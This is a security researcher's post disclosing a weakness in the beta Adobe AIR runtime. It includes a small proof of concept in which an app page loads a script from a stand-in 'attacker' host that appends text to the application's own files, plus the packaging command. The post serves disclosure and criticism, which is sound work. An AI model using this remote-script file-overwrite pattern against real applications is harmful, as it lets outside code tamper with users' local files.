Hi!
It's just a very first look to AIR (Adobes Integrated Runtime) and
its possibilities to process HTML/JS. AIR is beta by now, so Adobe
may change things in the final release.
Quote from Adobe: "Adobe Integrated Runtime (AIR) is a cross-
operating system runtime that allows you to leverage your existing
web development skills (Flash, Flex, HTML, JavaScript, Ajax) to build
and deploy Rich Internet Applications (RIAs) to the desktop."
In general every file on local file system can be accessed by AIR
apps. This includes reading, writing, appending or deletion as well
as testing for file and directory existence. Another interesting
feature is the possibility to overwrite calling files inside compiled
AIR application during runtime.
For this to work in a real world scenario a service used by an AIR
app must be vulnerable to a persistant XSS (or another typical
vulnerability), and the app needs to call data in a way that payloads
gets rendered and executed.
This basic example consists of 4 files:
<?xml version="1.0" encoding="UTF-8"?>
<application xmlns="http://ns.adobe.com/air/application/1.0.M4"
appId="air.poc.overwrite" version="0.1">
<name>AIR Overwrite</name>
<rootContent systemChrome="standard" visible="true">caller.html</
rootContent>
</application>
<html>
<head>
<title>AIR Overwrite</title>
<script src="AIRAliases.js" type="text/javascript"></script>
<script src="http://attacker/overwrite.js" type="text/javascript"></
script>
</head>
<body onload="remoteLoad()">
<h1>local data</h1>
</body>
</html>
function remoteLoad(){
var localFile = air.File.documentsDirectory;
localFile = localFile.resolve("/local/path/to/aip/resources/
caller.html");
// i.e. on MacOS: /Applications/AIR-overwrite.air/Contents/
Resources/caller.html
var localFileStream = new air.FileStream();
localFileStream.open(localFile, air.FileMode.APPEND);
localFileStream.writeUTFBytes("data from remote");
}
To compile, the AIR SDK must be installed (beside the actual
runtime). The bin of the SDK dir contains ADT, a command-line tool to
generate AIR files:
$ adt -package AIR-overwrite.air App.xml AIRAliases.js caller.html
After installing and running AIR-overwrite.app, "data from remote" is
appended to caller.html. Another interesting point for overwriting
inside AIR apps could be META-INF/application.xml which contains the
pointers to the resources or certificates.
The example is kinda lame, I know. With such remote access much
fancier stuff is imaginable. But what I found somehow funny is the
fact that AIR doesn't have any mechanism to recognize changes to its
own files.
Macromedia/Adobe Flash has a long history of bad or no security, so
AIR seems to stay in that long tradition. By introducing those PNDF
("Potentially Dangerous Native Functions" - thanks to Wisec for
making up this term :) Adobe opens new vectors XSS can cause. Stuff
like SameOrigin policies and access restrictions are there for a very
good and known reason. Adobe seem to know about the security
implications as they describe in their developer docs, but
nonetheless it doesn't makes it any better from my point of view.
There are already some real world services/sites offering AIR where
exploitation works the way described.
AIR installer
http://labs.adobe.com/downloads/air.html
AIR SDK
http://labs.adobe.com/downloads/airsdk.html
fukami
–
SektionEins GmbH
http://sektioneins.de